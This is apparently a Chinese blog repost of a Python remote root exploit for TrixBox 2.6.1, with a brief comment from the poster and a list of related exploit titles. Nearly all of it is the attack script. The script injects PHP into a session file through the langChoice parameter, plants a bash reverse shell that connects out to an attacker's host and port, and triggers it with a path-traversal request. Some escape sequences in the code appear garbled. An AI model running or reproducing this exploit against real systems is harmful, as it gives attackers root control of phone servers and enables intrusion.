TrixBox 2.6.1 langChoice remote root exploit
2008-07-18 22:44
363 查看
# TrixBox 2.6.1 langChoice remote root exploit # muts from offensive-security.com # chris from offensive-security.com # All credits to Jean-Michel BESNARD # Same same, but different. # http://www.offensive-security.com/0day/trixbox.py.txt ################################################################################ # id # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6 # (disk),10(wheel) # uname -a # Linux trixbox1.localdomain 2.6.25.7 #4 SMP Tue Jun 17 19:35:11 EDT 2008 i686 # i686 i386 GNU/Linux ################################################################################ import sys from socket import * import re import os from time import sleep print ("[*] BY THE POWER OF GRAYSKULL - I HAVE THE ROOTZ0R!/r/n" "[*] TrixBox 2.6.1 langChoice remote root exploit /r/n" "[*] http://www.offensive-security.com/0day/trixbox.py.txt/r/n") if (len(sys.argv)!=5): print "[*] Usage: %s " % sys.argv[0] exit(0) host=sys.argv[1] port=int(sys.argv[2]) lhost=sys.argv[3] lport=int(sys.argv[4]) def create_post(injection): buffer=("POST /user/index.php HTTP/1.1 /r/n" "Host: 192.168.219.132 /r/n" "Content-Type: application/x-www-form-urlencoded /r/n" "Content-Length: "+str(len(injection))+"/r/n/r/n" +injection) return buffer def send_post(host,port,input): s = socket(AF_INET, SOCK_STREAM) s.connect((host, port)) s.send(input) output=s.recv(1024) s.close() return output def find_sessionid(http_output): headers=re.split("/n",http_output) for header in headers: if re.search("Set-Cookie",header): cook=header.split(" ") sessionid=cook[1][10:42] print "[*] Session ID is %s" % sessionid return sessionid print "[*] Injecting reverse shell into session file" bash_inject="langChoice=<?php shell_exec(/"sudo /bin/bash 0/tcp/"+lhost+"/"+str(lport)+" 1>%260 2>%260/");?>" reverse=create_post(bash_inject) raw_session=send_post(host,port,reverse) print "[*] Extracting Session ID" id=find_sessionid(raw_session) print "[*] Triggering Reverse Shell to %s %d in 3 seconds" % (lhost,lport) sleep(3) print "[*] Skadush! /r/n[*] Ctrl+C to exit reverse shell." tmpsession=create_post('langChoice=../../../../../../../../../../tmp/sess_'+id+'%00') send_post(host,port,tmpsession) print "[*] Cleaning up" cleanup=create_post('langChoice=english') send_post(host,port,cleanup) send_post(host,port,cleanup) print "[*] Done!"
Trixbox是一个基于IP-PBX的VOIP语音电话系统,截止到6月13号发布的最新版本是2.6.1,官方网站是:http://www.trixbox.org. milw0rm上有人公布了一个remote root exploit,是用python语言所编写。由于最近12天我都在学python,所以看上去特别的亲切,收藏一下,方便以后自己写exp :)
相关文章推荐
- wu_ftpd <=2.6.1 remote root exploit
- Splunk Remote Root Exploit
- Linux x86 Dropbear SSH <= 0.34 remote root exploit
- Solaris 9 [UltraSPARC] sadmind Remote Root Exploit
- XlightFTP Server v3.7.0 Remote Root BOF Exploit
- MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE
- samba-2.2.8 < remote root exploit
- Apache/1.3.29 - Remote Root Exploit
- Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof
- WVTFTPD 0.9 heap overflow remote root exploit.c
- Seagate Central 2014.0410.0026-F Remote Root Exploit
- Xorg <= 1.10 remote root 0day exploit (32-bit x86)
- ColdFusion 9 / 10 Remote Root xday
- Windows RPC DCOM Remote Exploit with 48
- Apache Spamassassin Milter Plugin Remote Root Command Execution
- Debian <=5.0.6 /Ubuntu <=10.04 Webshell-Remote-Root
- LOCAL SOLARIS KERNEL ROOT EXPLOIT (< 5.10 138888-01)
- MS Internet Explorer 6/7 (XML Core Services) Remote Code Exec Exploit
- Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
- java.lang.IllegalStateException: Web app root system property already set to different value